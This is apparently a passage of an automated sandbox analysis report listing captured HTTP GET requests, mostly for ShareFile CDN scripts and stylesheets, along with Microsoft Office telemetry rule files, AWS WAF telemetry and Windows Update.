            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-workflows-pilet/0.119.14/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=kFefy6H4XXZOUGE&MD=FZCGLLdL HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
            Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-templates-pilet/0.108.2/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-entitlements-pilet/0.1.54/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /0093b71e39a6/478ed03bbf12/telemetry HTTP/1.1Host: 0093b71e39a6.11de9b12.us-east-1.token.awswaf.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-billing-pilet/0.1.121/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-fileviewer-pilet/1.29.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-request-list-pilet/1.9.18/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.25.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://premierbb.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-doc-gen-pilet/1.2.88/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-notification-center/0.58.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-publisher-pilet/0.17.11/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-resourcegen-pilet/0.1.36/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-package-pilet/0.37.12/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-act-hist-pilet/1.7.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-pilet/0.8.16/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
            Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-integrations-pilet/0.0.175/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
